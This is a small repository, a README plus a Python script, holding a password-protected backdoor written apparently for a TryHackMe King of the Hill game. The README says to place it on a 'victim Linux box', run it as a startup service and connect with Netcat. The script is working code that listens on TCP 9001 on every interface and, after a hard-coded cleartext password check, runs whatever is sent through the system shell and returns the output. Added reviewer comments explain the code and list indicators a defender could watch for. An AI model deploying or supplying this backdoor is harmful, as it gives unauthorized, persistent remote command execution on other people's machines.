# Repository layout:
#   README.md
#   backdoor.py
#
# /README.md:
# --------------------------------------------------------------------------
# ## Password Protected Backdoor
#
# It's a simple password protected backdoor using subprocess to execute commands.
# Instructions:
# - Place on victim Linux box
# - Create a service to ensure it's running at startup
# - Use Netcat to connect to the Backdoor
#
# So why use this over other methods?
# Well, to be honest, you shouldn't lol.
# This is a more or less proof of concept for a King Of The Hill box for the
# Cyber Security training platform TryHackMe (https://tryhackme.com).
#
# Note: Traffic is NOT encrypted and is in CLEARTEXT. This is NOT SECURE and
# should not be treated as such.
#
# Created by Ronald Bartwitz
#
# To do:
# - [ ] Add support for Encryption
# --------------------------------------------------------------------------
# /backdoor.py:
# --------------------------------------------------------------------------
#!/usr/bin/env python3

# Reviewer summary: a threaded TCP listener that, after a one-line password
# check, passes whatever the client sends to the system shell and returns
# the command's stdout.
#
# NOTE(review): the listing was whitespace-collapsed; the indentation below is
# reconstructed from the statement order, with the `else` read as pairing with
# the password check. Leading spaces inside the banner literal, if any, are
# not recoverable from the listing.
#
# What a defender can key on, all taken from this file and its README:
#   - a Python process listening on TCP 9001 on all interfaces;
#   - shell child processes spawned by that Python process;
#   - cleartext traffic containing the fixed strings sent below (the banner,
#     "Correct Password!", "Password Incorrect", "Command: ");
#   - a startup service pointing at this script (README: "Create a service").

import socket
import subprocess
import threading

# Despite the name, '0.0.0.0' is the IPv4 wildcard address: the listener is
# reachable on every interface of the host, not only on loopback.
LOCALHOST = '0.0.0.0'
PORT = 9001
# Sent unencrypted at the start of each connection; the fixed text makes a
# stable content signature for network inspection.
banner = (b"""
================================================
Password Protected Backdoor
================================================

""")
class ClientThread(threading.Thread):
    """Thread serving one accepted client: banner, password check, command loop."""

    def __init__(self,clientAddress,clientsocket):
        """Keep the client socket and print the peer address.

        Only the socket is stored on the instance; `clientAddress` is printed
        here and not saved.
        """
        threading.Thread.__init__(self)
        self.csocket = clientsocket
        print ("New connection added: ", clientAddress)
    def run(self):
        """Send the banner, wait for the password, then run received text as shell commands."""
        # `clientAddress` here is not the constructor argument (it was never
        # saved on self) but the module-level name assigned in the accept loop
        # at the bottom of the file. With overlapping connections the printed
        # peer can belong to a newer client, so this output is not a reliable
        # record of who connected.
        print('Connected by', clientAddress)
        while True:
            # The inner loop below has no break, so the banner is sent once
            # per connection.
            self.csocket.send(banner)
            while True:
                data = self.csocket.recv(1024)
                # Single shared secret hard-coded in the source (placeholder
                # text as published), compared against one recv() chunk
                # including the trailing newline. It crosses the network in
                # cleartext, and nothing here limits, delays or logs failed
                # attempts.
                if data.decode() == "INSERT PASSWORD HERE\n":
                    self.csocket.send(b"Correct Password!\n")
                    while True:
                        data = self.csocket.recv(1024)
                        self.csocket.send(b"Command: " + data)
                        command = data.decode()
                        # shell=True hands the received text to the system
                        # shell unmodified, with the privileges of the account
                        # running this script. Only stdout is piped back to
                        # the client; stderr is not redirected. No command is
                        # logged by this code, so host process auditing is the
                        # place to recover what was executed.
                        proc = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE)
                        output = proc.stdout.read()
                        self.csocket.send(bytes(output))
                else:
                    self.csocket.send(b"Password Incorrect\n")
# Listener setup runs at import time: there is no main guard, so importing
# this module also binds the port and blocks in the accept loop.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# SO_REUSEADDR lets the socket be re-bound to the same port right after a
# restart.
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((LOCALHOST, PORT))
print("Server started")
print("Waiting for clients to connect...")

while True:
    # listen() is called again on every iteration with a backlog of 1000.
    s.listen(1000)
    # Assigns the module-level `clientAddress` that ClientThread.run() prints.
    clientsock, clientAddress = s.accept()
    # One thread per accepted connection; this code sets no cap on how many
    # run at once.
    newthread = ClientThread(clientAddress, clientsock)
    newthread.start()